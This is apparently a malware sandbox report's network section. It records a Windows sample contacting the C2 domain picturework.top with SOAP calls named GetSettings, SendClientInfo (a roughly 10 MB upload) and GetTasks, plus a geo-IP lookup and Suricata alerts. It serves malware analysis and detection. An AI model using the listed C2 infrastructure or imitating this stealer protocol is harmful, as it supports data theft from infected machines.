Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
picturework.top | 8.211.5.55 | |
edgedl.gvt1.com | 142.250.34.2 | |
api.ip.sb | 104.26.12.31 |
- TCP Requests
-
-
192.168.56.102:49810 104.26.12.31:443api.ip.sb
-
192.168.56.102:49819 142.250.34.2:80edgedl.gvt1.com
-
192.168.56.102:49797 172.217.25.14:443
-
192.168.56.102:49818 216.58.220.195:443
-
192.168.56.102:49809 8.211.5.55:80picturework.top
-
192.168.56.102:49817 8.211.5.55:80picturework.top
-
192.168.56.102:49820 8.211.5.55:80picturework.top
-
- UDP Requests
-
-
192.168.56.102:50839 164.124.101.2:53
-
192.168.56.102:54221 164.124.101.2:53
-
192.168.56.102:54660 164.124.101.2:53
-
192.168.56.102:57660 164.124.101.2:53
-
192.168.56.102:61459 164.124.101.2:53
-
192.168.56.102:61998 164.124.101.2:53
-
192.168.56.102:137 192.168.56.255:137
-
192.168.56.102:138 192.168.56.255:138
-
192.168.56.102:49152 239.255.255.250:3702
-
192.168.56.102:56752 239.255.255.250:1900
-
192.168.56.102:57661 239.255.255.250:3702
-
192.168.56.102:61460 239.255.255.250:3702
-
52.231.114.183:123 192.168.56.102:123
-
GET
200
https://api.ip.sb/geoip
REQUEST
RESPONSE
BODY
GET /geoip HTTP/1.1
Host: api.ip.sb
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Mon, 22 Mar 2021 01:27:15 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 349
Connection: keep-alive
Set-Cookie: __cfduid=d060d2c1fea6f91681743a415850665921616376435; expires=Wed, 21-Apr-21 01:27:15 GMT; path=/; domain=.ip.sb; HttpOnly; SameSite=Lax
Vary: Accept-Encoding
Vary: Accept-Encoding
Cache-Control: no-cache
Access-Control-Allow-Origin: *
CF-Cache-Status: DYNAMIC
cf-request-id: 08f9242a8e0000051faf8ab000000001
Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
Report-To: {"max_age":604800,"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report?s=RQXSUOpWbaUlhjJWwwX6vhQ2EGJmHkcJLi4p8v76lk%2FKB1wzNwyewIZiBO0BqTAijP%2Bk9cnbOIqcsZmk1oI3VzY9DYHyXFugWfM%3D"}],"group":"cf-nel"}
NEL: {"report_to":"cf-nel","max_age":604800}
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Server: cloudflare
CF-RAY: 633ba2f0edb6051f-LAX
POST
200
https://update.googleapis.com/service/update2?cup2key=10:4230926761&cup2hreq=54883cade0ed38d56a1f9540f8d2bc8aa67fac2351aa803d4e909eeec3ddc91d
REQUEST
RESPONSE
BODY
POST /service/update2?cup2key=10:4230926761&cup2hreq=54883cade0ed38d56a1f9540f8d2bc8aa67fac2351aa803d4e909eeec3ddc91d HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
User-Agent: Google Update/1.3.36.32;winhttp;cup-ecdsa
X-Old-UID: cnt=0
X-Goog-Update-AppId: {430FD4D0-B729-4F61-AA34-91526481799D},{8A69D345-D564-463C-AFF1-A69D9E530F96}
X-Goog-Update-Updater: Omaha-1.3.36.32
X-Goog-Update-Interactivity: bg
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Content-Length: 1202
Host: update.googleapis.com
HTTP/1.1 200 OK
Content-Security-Policy: script-src 'report-sample' 'nonce-fIkhNfJrcETs08xdCm6v9Q' 'unsafe-inline' 'strict-dynamic' https: http:;object-src 'none';base-uri 'self';report-uri https://csp.withgoogle.com/csp/clientupdate-aus/1
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Date: Mon, 22 Mar 2021 01:27:20 GMT
X-Cup-Server-Proof: 3046022100c2bbff5649d3c42161913627a66180e64c58c798d076e3b731bd9b938b8b4ff5022100e16e58b9ce003ee7b46ab36438edb15d2478885b9808ff9b33683f5c1b289689:54883cade0ed38d56a1f9540f8d2bc8aa67fac2351aa803d4e909eeec3ddc91d
Content-Type: text/xml; charset=UTF-8
X-Daynum: 5193
X-Daystart: 66440
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Alt-Svc: h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Accept-Encoding
Transfer-Encoding: chunked
POST
200
http://picturework.top/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/IRemotePanel/GetSettings"
Host: picturework.top
Content-Length: 136
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Length: 1174
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Mon, 22 Mar 2021 01:27:14 GMT
Connection: close
POST
200
http://picturework.top/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/IRemotePanel/SendClientInfo"
Host: picturework.top
Content-Length: 10198747
Expect: 100-continue
Accept-Encoding: gzip, deflate
HTTP/1.1 200 OK
Content-Length: 147
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Mon, 22 Mar 2021 01:27:30 GMT
Connection: close
HEAD
200
http://edgedl.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe
REQUEST
RESPONSE
BODY
HEAD /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: edgedl.gvt1.com
HTTP/1.1 200 OK
accept-ranges: bytes
content-disposition: attachment
content-length: 1304160
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "8346e1"
last-modified: Fri, 22 Jan 2021 06:31:14 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Mon, 22 Mar 2021 01:23:49 GMT
age: 213
cache-control: public,max-age=3600
POST
200
http://picturework.top/
REQUEST
RESPONSE
BODY
POST / HTTP/1.1
Content-Type: text/xml; charset=utf-8
SOAPAction: "http://tempuri.org/IRemotePanel/GetTasks"
Host: picturework.top
Content-Length: 1643
Expect: 100-continue
Accept-Encoding: gzip, deflate
HTTP/1.1 200 OK
Content-Length: 250
Content-Type: text/xml; charset=utf-8
Server: Microsoft-HTTPAPI/2.0
Date: Mon, 22 Mar 2021 01:27:30 GMT
Connection: close
GET
206
http://edgedl.gvt1.com/edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe
REQUEST
RESPONSE
BODY
GET /edgedl/release2/update2/ALmnr7lDhOvozdF08iOk7Ks_1.3.36.72/GoogleUpdateSetup.exe HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Encoding: identity
If-Unmodified-Since: Fri, 22 Jan 2021 06:31:14 GMT
Range: bytes=0-4935
User-Agent: Microsoft BITS/7.5
X-Old-UID: cnt=0
X-Last-HR: 0x0
X-Last-HTTP-Status-Code: 0
X-Retry-Count: 0
X-HTTP-Attempts: 1
Host: edgedl.gvt1.com
HTTP/1.1 206 Partial Content
accept-ranges: bytes
content-disposition: attachment
content-length: 4936
content-security-policy: default-src 'none'
content-type: application/octet-stream
etag: "8346e1"
last-modified: Fri, 22 Jan 2021 06:31:14 GMT
server: Google-Edge-Cache
x-content-type-options: nosniff
x-frame-options: SAMEORIGIN
x-xss-protection: 0
date: Mon, 22 Mar 2021 01:23:49 GMT
age: 223
content-range: bytes 0-4935/1304160
cache-control: public,max-age=3600
ICMP traffic
No ICMP traffic performed.
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
UDP 192.168.56.102:50839 -> 164.124.101.2:53 | 2023883 | ET DNS Query to a *.top domain - Likely Hostile | Potentially Bad Traffic |
TCP 192.168.56.102:49817 -> 8.211.5.55:80 | 2023882 | ET INFO HTTP Request to a *.top domain | Potentially Bad Traffic |
TCP 192.168.56.102:49810 -> 104.26.12.31:443 | 906200056 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 192.168.56.102:49818 -> 216.58.220.195:443 | 906200022 | SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee) | undefined |
TCP 142.250.34.2:80 -> 192.168.56.102:49819 | 2018959 | ET POLICY PE EXE or DLL Windows file download HTTP | Potential Corporate Privacy Violation |
TCP 142.250.34.2:80 -> 192.168.56.102:49819 | 2014520 | ET INFO EXE - Served Attached HTTP | Misc activity |
Suricata TLS
Flow | Issuer | Subject | Fingerprint |
---|---|---|---|
TLSv1 192.168.56.102:49810 104.26.12.31:443 |
C=US, O=Cloudflare, Inc., CN=Cloudflare Inc ECC CA-3 | C=US, ST=CA, L=San Francisco, O=Cloudflare, Inc., CN=sni.cloudflaressl.com | 5e:7d:19:2d:d7:66:0c:63:45:a5:24:8f:b7:db:35:a7:61:6d:89:0e |
TLS 1.2 192.168.56.102:49818 216.58.220.195:443 |
C=US, O=Google Trust Services, CN=GTS CA 1O1 | C=US, ST=California, L=Mountain View, O=Google LLC, CN=upload.video.google.com | 3a:64:d0:6c:61:07:6b:6b:27:d2:ca:a4:29:2c:fe:46:60:2e:51:1c |
Snort Alerts
No Snort Alerts